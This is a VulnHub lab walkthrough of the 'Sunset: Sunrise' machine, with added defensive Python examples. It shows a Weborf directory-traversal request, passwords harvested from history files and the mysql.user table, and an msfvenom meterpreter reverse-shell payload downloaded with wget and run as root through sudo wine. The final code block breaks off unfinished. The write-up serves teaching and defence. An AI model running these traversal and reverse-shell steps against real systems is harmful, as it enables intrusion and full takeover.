VulnHub machine walkthrough [sunset-sunrise]

Name: Sunset: Sunrise
Release date: 6 December 2019

Download:

  • Download: https://mega.nz/#!IKQQ2SxZ!anBsBnlQrYh2ELYWYa1mHYKG_7kRw402zfo2WOOB8Z0
  • Download (Mirror): https://download.vulnhub.com/sunset/sunrise.7z
  • Download (Torrent): https://download.vulnhub.com/sunset/sunrise.7z.torrent

Description:

Notes: Have fun!
Difficulty: Beginner
Contact: @whitecr0wz

Information gathering

Start with nmap:

root@kali:~# nmap -sn -v 192.168.56.0/24
Nmap scan report for 192.168.56.104
Host is up (0.00027s latency).
MAC Address: 08:00:27:67:12:DE (Oracle VirtualBox virtual NIC)
root@kali:~# nmap -A -v -sS -sV -Pn -T5 -p- --script=vuln 192.168.56.104
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http Apache httpd 2.4.38
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /: Root directory w/ listing on 'apache/2.4.38 (debian)'
|_http-server-header: Apache/2.4.38 (Debian)
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.56.104:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://192.168.56.104:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/?C=D%3bO%3dD%27%20OR%20sqlspider
| http://192.168.56.104:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/?C=M%3bO%3dD%27%20OR%20sqlspider
| http://192.168.56.104:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/?C=S%3bO%3dD%27%20OR%20sqlspider
| http://192.168.56.104:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://192.168.56.104:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|_ http://192.168.56.104:80/?C=N%3bO%3dA%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
3306/tcp open mysql?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings:
| NULL:
|_ Host '192.168.56.102' is not allowed to connect to this MariaDB server
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
8080/tcp open http-proxy Weborf (GNU/Linux)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Page not found: Weborf (GNU/Linux)
| Content-Length: 202
| Content-Type: text/html
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 404</H1>Page not found <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
| GetRequest:
| HTTP/1.1 200
| Server: Weborf (GNU/Linux)
| Content-Length: 326
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body><table><tr><td></td><td>Name</td><td>Size</td></tr><tr style="background-color: #DFDFDF;"><td>d</td><td><a href="html/">html/</a></td><td>-</td></tr>
| </table><p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
| HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 200
| Server: Weborf (GNU/Linux)
| Allow: GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE
| DAV: 1,2
| DAV: <http://apache.org/dav/propset/fs/1>
| MS-Author-Via: DAV
| Socks5:
| HTTP/1.1 400 Bad request: Weborf (GNU/Linux)
| Content-Length: 199
| Content-Type: text/html
|_ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 400</H1>Bad request <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
| http-enum:
| /../../../../../../../../../../etc/passwd: Possible path traversal in URI
| /../../../../../../../../../../boot.ini: Possible path traversal in URI
|_ /html/: Potentially interesting folder
|_http-server-header: Weborf (GNU/Linux)

Visiting http://192.168.56.104:8080/ shows the server is Weborf/0.12.2.

Now search searchsploit for Weborf. If nothing had turned up, the next step would be to try other approaches, but it does turn one up: this version of Weborf is vulnerable to directory traversal. Pull the exploit's text to read the details; it shows the vulnerable code path and a request that triggers it, so let's try it.

root@kali:~# searchsploit Weborf 0.12.2
-------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------- ----------------------------------------
weborf 0.12.2 - Directory Traversal | exploits/linux/remote/14925.txt
-------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
root@kali:~# searchsploit -m 14925
Exploit: weborf 0.12.2 - Directory Traversal
URL: https://www.exploit-db.com/exploits/14925
Path: /usr/share/exploitdb/exploits/linux/remote/14925.txt
File Type: ASCII text, with CRLF line terminators

Copied to: /root/14925.txt


root@kali:~# cat 14925.txt
Title: Weborf httpd <= 0.12.2 Directory Traversal Vulnerability
Date: Sep 6, 2010
Author: Rew
Link: http://galileo.dmi.unict.it/wiki/weborf/doku.php
Version: 0.12.2
Tested On: Debian 5
CVE: N/A

=============================================================

Weborf httpd <= 0.12.2 suffers a directory traversal
vulnerability. This vulnerability could allow
attackers to read arbitrary files and hak th3 plan3t.

instance.c : line 240-244
------------------------------
void modURL(char* url) {
//Prevents the use of .. to access the whole filesystem <-- ORLY?
strReplace(url,"../",'\0');

replaceEscape(url);
------------------------------

Exploit: GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

==============================================================

Stay safe,
Over and Outr
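The exploit text above pinpoints the bug: modURL() deletes the literal string "../" and only afterwards percent-decodes, so an encoded "..%2f" survives the deletion and turns into "../" once decoded. The Python below is an added example, not Weborf's code or the exploit author's: weak_modurl() reproduces that strip-then-decode order, safe_resolve() shows the fix a server should apply (decode first, then walk the path components and refuse any ".." that would climb above the document root, or any decoded NUL byte), and is_traversal_attempt() is the equivalent check for access-log review. The DOCROOT value and the function names are assumptions for the example.

```python
"""Added example (not Weborf's code): strip-then-decode vs. decode-then-check."""
from urllib.parse import unquote
import posixpath

DOCROOT = "/var/www/html"   # assumed document root for the example


def weak_modurl(url):
    """Mimic the order used by the vulnerable modURL(): delete every literal
    "../" first and percent-decode afterwards.  An encoded "..%2f" is untouched
    by the deletion and only becomes "../" once it is decoded."""
    while "../" in url:
        url = url.replace("../", "")
    return unquote(url)


def safe_resolve(docroot, url):
    """Decode first, then canonicalise by walking the components.  Every "."
    is dropped and every ".." pops one component; a ".." with nothing left to
    pop would leave docroot, so the request is rejected.  Returns the absolute
    filesystem path to serve, or None when the request must be refused."""
    decoded = unquote(url.split("?", 1)[0])
    if "\x00" in decoded:            # "%00" would truncate a C string path
        return None
    parts = []
    for comp in decoded.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not parts:            # would climb above the document root
                return None
            parts.pop()
            continue
        parts.append(comp)
    return posixpath.join(docroot, *parts)


def is_traversal_attempt(url):
    """Access-log check: True when the decoded path contains a ".." component,
    whether it was sent literally or percent-encoded."""
    return ".." in unquote(url.split("?", 1)[0]).split("/")


if __name__ == "__main__":
    probe = "/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
    print("weak_modurl  ->", weak_modurl(probe))
    print("safe_resolve ->", safe_resolve(DOCROOT, probe))
    print("safe_resolve ->", safe_resolve(DOCROOT, "/html/../html/./index.html"))
```

The walk rejects the request rather than silently clamping it at the root, which is what you want: a clamped request would still be served and the probe would never show up as an error in the logs.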

Following the technique in the exploit, build the PoC below and request it:

http://192.168.56.104:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

Now we can browse files on the target machine. Let's look in the home directory of the user sunrise, where there is a user.txt file.

http://192.168.56.104:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2f

Opening user.txt shows the text below, a simple user flag:

a6050aecf6303b0b824038807d823a89

Next, run a directory brute-force against the URL below:

http://192.168.56.104:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f
root@kali:~# dirb http://192.168.56.104:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed Dec 25 03:38:57 2019
URL_BASE: http://192.168.56.104:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.56.104:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f/ ----
+ http://192.168.56.104:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f/.bashrc (CODE:200|SIZE:3526)
+ http://192.168.56.104:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f/.mysql_history (CODE:200|SIZE:83)
+ http://192.168.56.104:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f/.profile (CODE:200|SIZE:807)
-----------------
END_TIME: Wed Dec 25 03:39:12 2019
DOWNLOADED: 4612 - FOUND: 3

Visiting the URL below gives:

http://192.168.56.104:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f/.mysql_history

show databases;
ALTER USER 'weborf'@'localhost' IDENTIFIED BY 'iheartrainbows44';
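The .mysql_history file above is the root cause of this foothold: an ALTER USER ... IDENTIFIED BY statement was typed interactively, the client history recorded the password in clear text, and the Weborf traversal let anyone read it. The Python below is an added example, not part of the original write-up: it scans history text for statements and command lines that embed a password and reports each hit with the secret redacted, so it can run as an operator check or a cron job without re-exposing the value. The SAMPLE_HISTORY lines are constructed for this example, the EXAMPLE-PASS-* strings are placeholders, and the function names are assumptions.

```python
"""Added example (not from the write-up): find credentials left in history files."""
import re
import os

# Constructed sample of a ~/.mysql_history and a shell history, not the
# target's real files.  Every EXAMPLE-PASS-* value is a placeholder.
SAMPLE_HISTORY = """\
show databases;
ALTER USER 'weborf'@'localhost' IDENTIFIED BY 'EXAMPLE-PASS-1';
SET PASSWORD FOR 'app'@'%' = PASSWORD('EXAMPLE-PASS-2');
CREATE USER 'svc'@'localhost' IDENTIFIED BY "EXAMPLE-PASS-3";
select count(*) from mysql.user;
mysql -uweborf -pEXAMPLE-PASS-4 mysql
mysql --user=app --password=EXAMPLE-PASS-5 -h db.internal
GRANT ALL ON *.* TO 'dba'@'localhost' IDENTIFIED BY 'EXAMPLE-PASS-6';
"""

# Each entry: (pattern that captures the prefix to keep and the secret,
#              replacement that keeps the prefix and redacts the secret).
LEAK_PATTERNS = {
    "IDENTIFIED BY": (re.compile(r"(IDENTIFIED\s+BY\s+)(['\"])(.*?)\2", re.I), r"\1\2***\2"),
    "PASSWORD()": (re.compile(r"(PASSWORD\s*\(\s*)(['\"])(.*?)\2", re.I), r"\1\2***\2"),
    "mysql -p": (re.compile(r"(\bmysql\b.*?\s-p)(\S+)"), r"\1***"),
    "mysql --password": (re.compile(r"(--password=)(\S+)"), r"\1***"),
}

HISTORY_FILES = (".mysql_history", ".bash_history", ".psql_history")


def find_leaks(text):
    """Return (line_number, kind, redacted_line) for each line that embeds a
    password.  A line is reported once, under the first matching pattern."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, (regex, replacement) in LEAK_PATTERNS.items():
            if regex.search(line):
                hits.append((lineno, kind, regex.sub(replacement, line)))
                break
    return hits


def scan_home_dirs(root="/home"):
    """Scan the usual history files in every home directory under root;
    missing or unreadable files are skipped.  Returns {path: hits}."""
    report = {}
    for user_dir in (os.path.join(root, d) for d in sorted(os.listdir(root))):
        for name in HISTORY_FILES:
            path = os.path.join(user_dir, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_leaks(fh.read())
            except OSError:
                continue
            if hits:
                report[path] = hits
    return report


if __name__ == "__main__":
    for lineno, kind, redacted in find_leaks(SAMPLE_HISTORY):
        print(f"line {lineno:>3} [{kind}] {redacted}")
```

The remediation on the server side is the same whichever pattern fires: rotate the credential, and keep the history from being written in the first place (MYSQL_HISTFILE=/dev/null for the mysql client, or HISTCONTROL/HISTIGNORE for the shell).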

Getting a shell

SSH login with the username and password weborf/iheartrainbows44 succeeds:

root@kali:~# ssh weborf@192.168.56.104
The authenticity of host '192.168.56.104 (192.168.56.104)' can't be established.
ECDSA key fingerprint is SHA256:4yaOo7mwlBs//3V1VVqqtiApksgelyI4AJwhIUfz0UQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.104' (ECDSA) to the list of known hosts.
weborf@192.168.56.104's password:
Linux sunrise 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Dec 5 16:24:32 2019 from 192.168.1.146
weborf@sunrise:~$ id
uid=1001(weborf) gid=1001(weborf) groups=1001(weborf)
weborf@sunrise:~$ whoami
weborf
weborf@sunrise:~$ pwd
/home/weborf

Privilege escalation

Connect to the database to obtain usernames and passwords:

weborf@sunrise:~$ mysql -uweborf -piheartrainbows44
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 37
Server version: 10.3.18-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
+--------------------+
3 rows in set (0.028 sec)

MariaDB [(none)]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [mysql]> show tables;
+---------------------------+
| Tables_in_mysql |
+---------------------------+
| column_stats |
| columns_priv |
| db |
| event |
| func |
| general_log |
| gtid_slave_pos |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| index_stats |
| innodb_index_stats |
| innodb_table_stats |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| roles_mapping |
| servers |
| slow_log |
| table_stats |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
| transaction_registry |
| user |
+---------------------------+
31 rows in set (0.000 sec)
MariaDB [mysql]> select * from user;
+-----------+---------+-------------------------------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+---------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+-------------+-------------------------------------------+------------------+---------+--------------+--------------------+
| Host | User | Password | Select_priv | Insert_priv | Update_priv | Delete_priv | Create_priv | Drop_priv | Reload_priv | Shutdown_priv | Process_priv | File_priv | Grant_priv | References_priv | Index_priv | Alter_priv | Show_db_priv | Super_priv | Create_tmp_table_priv | Lock_tables_priv | Execute_priv | Repl_slave_priv | Repl_client_priv | Create_view_priv | Show_view_priv | Create_routine_priv | Alter_routine_priv | Create_user_priv | Event_priv | Trigger_priv | Create_tablespace_priv | Delete_history_priv | ssl_type | ssl_cipher | x509_issuer | x509_subject | max_questions | max_updates | max_connections | max_user_connections | plugin | authentication_string | password_expired | is_role | default_role | max_statement_time |
+-----------+---------+-------------------------------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+---------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+-------------+-------------------------------------------+------------------+---------+--------------+--------------------+
| localhost | root | *C7B6683EEB8FF8329D8390574FAA04DD04B87C58 | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | | | | | 0 | 0 | 0 | 0 | unix_socket | *AF554C323F838EB43A3D464034692C0994346ED8 | N | N | | 0.000000 |
| localhost | sunrise | thefutureissobrightigottawearshades | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | | | | | 0 | 0 | 0 | 0 | | | N | N | | 0.000000 |
| localhost | weborf | *A76018C6BB42E371FD7B71D2EC6447AE6E37DB28 | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | N | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | | | | | 0 | 0 | 0 | 0 | | | N | N | | 0.000000 |
+-----------+---------+-------------------------------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+---------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+-------------+-------------------------------------------+------------------+---------+--------------+--------------------+
3 rows in set (0.000 sec)
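The user table dump above deserves a second look from the defender's side: the sunrise row carries its password in clear text in the Password column (it was written directly into the column instead of through PASSWORD() or ALTER USER), root keeps GRANT OPTION, and the remaining hashes are mysql_native_password, which is cheap to attack offline. The Python below is an added example, not part of the write-up: it parses the box-drawn output of select * from mysql.user and flags those conditions. The sample table is constructed with a reduced column set (the two hashes are the ones shown above, the plaintext value is a placeholder), and the finding codes and function names are assumptions.

```python
"""Added example (not from the write-up): audit a mysql.user dump for weak account hygiene."""
import re

# Constructed sample with a reduced column set, in the box-drawn format the
# mysql/MariaDB client prints.  PlaintextExample123 is a placeholder.
SAMPLE_USER_TABLE = """\
+-----------+---------+-------------------------------------------+------------+-------------+-----------------------+
| Host      | User    | Password                                  | Grant_priv | plugin      | authentication_string |
+-----------+---------+-------------------------------------------+------------+-------------+-----------------------+
| localhost | root    | *C7B6683EEB8FF8329D8390574FAA04DD04B87C58 | Y          | unix_socket |                       |
| localhost | sunrise | PlaintextExample123                       | N          |             |                       |
| localhost | weborf  | *A76018C6BB42E371FD7B71D2EC6447AE6E37DB28 | N          |             |                       |
| %         | app     |                                           | N          |             |                       |
+-----------+---------+-------------------------------------------+------------+-------------+-----------------------+
"""

# mysql_native_password hashes are "*" followed by 40 upper-case hex digits.
NATIVE_HASH = re.compile(r"^\*[0-9A-F]{40}$")


def parse_table(text):
    """Turn the client's box-drawn table into a list of dicts keyed by header."""
    rows = [[cell.strip() for cell in line.strip().strip("|").split("|")]
            for line in text.splitlines() if line.lstrip().startswith("|")]
    header, body = rows[0], rows[1:]
    return [dict(zip(header, row)) for row in body]


def audit_users(records):
    """Return (account, finding_code) pairs.  Codes are assumptions for the example."""
    findings = []
    for r in records:
        account = f"{r['User']}@{r['Host']}"
        password = r.get("Password", "")
        if password and not NATIVE_HASH.match(password):
            # A value that is not a hash was stored directly in the column.
            findings.append((account, "PLAINTEXT_PASSWORD"))
        if not password and not r.get("authentication_string") and r.get("plugin") != "unix_socket":
            findings.append((account, "NO_PASSWORD"))
        if r.get("Grant_priv") == "Y":
            findings.append((account, "GRANT_OPTION"))
        if r.get("Host") == "%":
            findings.append((account, "WILDCARD_HOST"))
    return findings


if __name__ == "__main__":
    for account, code in audit_users(parse_table(SAMPLE_USER_TABLE)):
        print(f"{account:<20} {code}")
```

The parser only relies on the leading "|" of data rows and on the header names, so it works on the full 47-column dump above as well; the reduced sample just keeps the example readable.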

Cracking root's hash yields purplerain54732; switching directly to root completes the privilege escalation:

weborf@sunrise:~$ su root
Password:
root@sunrise:/home/weborf# ls
weborf-0.12.2
root@sunrise:/home/weborf# id
uid=0(root) gid=0(root) groups=0(root)
root@sunrise:/home/weborf# whoami
root

Get the flag:

root@sunrise:/home/weborf# cd /root
root@sunrise:~# ls
Desktop Documents Downloads Groups Logs Manual Music Pictures Public Readme root.txt Templates Users Videos
root@sunrise:~# cat root.txt
^^ @@@@@@@@@
^^ ^^ @@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@ ^^
@@@@@@@@@@@@@@@@@@@@
~~~~ ~~ ~~~~~ ~~~~~~~~ ~~ &&&&&&&&&&&&&&&&&&&& ~~~~~~~ ~~~~~~~~~~~ ~~~
~ ~~ ~ ~ ~~~~~~~~~~~~~~~~~~~~ ~ ~~ ~~ ~
~ ~~ ~~ ~~ ~~ ~~~~~~~~~~~~~ ~~~~ ~ ~~~ ~ ~~~ ~ ~~
~ ~~ ~ ~ ~~~~~~ ~~ ~~~ ~~ ~ ~~ ~~ ~
~ ~ ~ ~ ~ ~~ ~~~~~~ ~ ~~ ~ ~~
~ ~ ~ ~ ~~ ~ ~

Thanks for playing! - Felipe Winsnes (@whitecr0wz)

24edb59d21c273c033aa6f1689b0b18c

What a beautiful sunrise!!!

Another way

If root's hash cannot be cracked, you can also log in as sunrise/thefutureissobrightigottawearshades and escalate from there; splitting the password into words shows it reads:

the future is so bright i gotta wear shades

Login succeeds:

weborf@sunrise:~$ su sunrise
Password:
sunrise@sunrise:/home/weborf$ id
uid=1000(sunrise) gid=1000(sunrise) groups=1000(sunrise),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),115(lpadmin),116(scanner)
sunrise@sunrise:/home/weborf$ whoami
sunrise

The privilege-escalation steps follow; the usual privesc scripts are hardly needed here, doing it by hand is faster and more precise:

sunrise@sunrise:~$ sudo -l
[sudo] password for sunrise:
Matching Defaults entries for sunrise on sunrise:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sunrise may run the following commands on sunrise:
(root) /usr/bin/wine

sunrise@sunrise:~$ cd /tmp
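The sudo -l output above is the whole privilege-escalation story: a rule that lets sunrise run /usr/bin/wine as root is equivalent to letting sunrise run any Windows executable as root. Reviewing sudoers by eye does not scale, so the Python below, an added example that is not from the write-up, parses sudo -l output and flags rules that grant ALL, NOPASSWD rules, and commands whose job is to load and run arbitrary code supplied by the caller. The sample output is constructed (it mirrors the shape of the real one above), and the set of code-loading commands and the finding codes are assumptions to be extended for a given environment.

```python
"""Added example (not from the write-up): flag dangerous rules in `sudo -l` output."""
import re

# Constructed sample in the same shape as the real output above.
SAMPLE_SUDO_L = """\
Matching Defaults entries for sunrise on sunrise:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User sunrise may run the following commands on sunrise:
    (root) /usr/bin/wine
    (root) NOPASSWD: /usr/bin/systemctl restart nginx
    (ALL : ALL) ALL
"""

# Commands whose only job is to execute whatever the caller hands them; a sudo
# rule on one of these is a root shell in disguise.  Assumed set, extend as needed.
CODE_LOADERS = {"wine"}

RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<nopasswd>NOPASSWD:\s*)?(?P<command>.+?)\s*$")


def parse_sudo_l(text):
    """Return (runas, nopasswd, command) for each rule after the 'may run' line."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE.match(line) if in_rules else None
        if m:
            rules.append((m["runas"].strip(), bool(m["nopasswd"]), m["command"]))
    return rules


def audit_rules(rules):
    """Return (command, finding_code) pairs; codes are assumptions for the example."""
    findings = []
    for runas, nopasswd, command in rules:
        if command == "ALL":
            findings.append((command, "UNRESTRICTED_ALL"))
            continue
        binary = command.split()[0].rsplit("/", 1)[-1]
        if binary in CODE_LOADERS:
            findings.append((command, "CODE_LOADER"))
        if nopasswd:
            findings.append((command, "NOPASSWD"))
    return findings


if __name__ == "__main__":
    for command, code in audit_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"{code:<18} {command}")
```

A rule on a code loader cannot be fixed by narrowing the arguments (wine takes the program to run as its argument); the fix is to drop the rule and grant the specific task some other way.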

Wine (a recursive acronym for "Wine Is Not an Emulator") is a free, open-source compatibility layer that lets programs (application software and games) developed for Microsoft Windows run on Unix-like operating systems.

Since wine can be run as root, create a payload that wine can execute. Use msfpc to create it. Once the payload is built, run a Python one-liner HTTP server to transfer it to the target machine:

root@kali:~# msfpc windows 192.168.56.102
[*] MSFvenom Payload Creator (MSFPC v1.4.5)
[i] IP: 192.168.56.102
[i] PORT: 443
[i] TYPE: windows (windows/meterpreter/reverse_tcp)
[i] CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe \
--platform windows -a x86 -e generic/none LHOST=192.168.56.102 LPORT=443 \
> '/root/windows-meterpreter-staged-reverse-tcp-443.exe'


[i] windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.exe'

[i] MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
[i] Run: msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
[?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
[*] Done!

root@kali:~# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...

With the payload hosted on the attacker's machine, download it to the target with wget. Once the payload has been transferred, execute it with sudo and wine:

sunrise@sunrise:/tmp$ wget http://192.168.56.102:8000/windows-meterpreter-staged-reverse-tcp-443.exe
--2019-12-25 04:29:12-- http://192.168.56.102:8000/windows-meterpreter-staged-reverse-tcp-443.exe
Connecting to 192.168.56.102:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73802 (72K) [application/x-msdos-program]
Saving to: ‘windows-meterpreter-staged-reverse-tcp-443.exe’

windows-meterpreter-staged-reverse-tcp-443.exe 100%[=======================================================================================================================================>] 72.07K --.-KB/s in 0s

2019-12-25 04:29:12 (439 MB/s) - ‘windows-meterpreter-staged-reverse-tcp-443.exe’ saved [73802/73802]

sunrise@sunrise:/tmp$ sudo wine windows-meterpreter-staged-reverse-tcp-443.exe
[sudo] password for sunrise:
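From the blue-team side the sequence above leaves a clear trace: sudo writes every invocation to the auth log, including the working directory and the full command, so a root-privileged wine launch of a freshly downloaded .exe in /tmp is visible without any endpoint agent. The Python below is an added example, not from the write-up: it parses sudo entries from syslog-style auth.log lines and flags those that run a command or file from a world-writable staging directory, or that hand a Windows executable to wine. The log lines are constructed for the example, and the staging-directory list, the rule names and the function names are assumptions.

```python
"""Added example (not from the write-up): detect sudo launches of staged binaries in auth.log."""
import re
import posixpath

# Constructed auth.log excerpt; the hostname and paths mirror the session
# above, but the lines are not a capture from the target.
SAMPLE_AUTH_LOG = """\
Dec 25 04:28:50 sunrise sudo:  sunrise : TTY=pts/0 ; PWD=/home/sunrise ; USER=root ; COMMAND=/usr/bin/apt update
Dec 25 04:29:40 sunrise sudo:  sunrise : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/wine windows-meterpreter-staged-reverse-tcp-443.exe
Dec 25 04:31:02 sunrise sudo:  sunrise : TTY=pts/0 ; PWD=/home/sunrise ; USER=root ; COMMAND=/usr/bin/wine /dev/shm/tool.exe
Dec 25 04:32:10 sunrise sudo:  sunrise : TTY=pts/0 ; PWD=/home/sunrise ; USER=root ; COMMAND=/usr/bin/systemctl restart nginx
"""

SUDO_LINE = re.compile(
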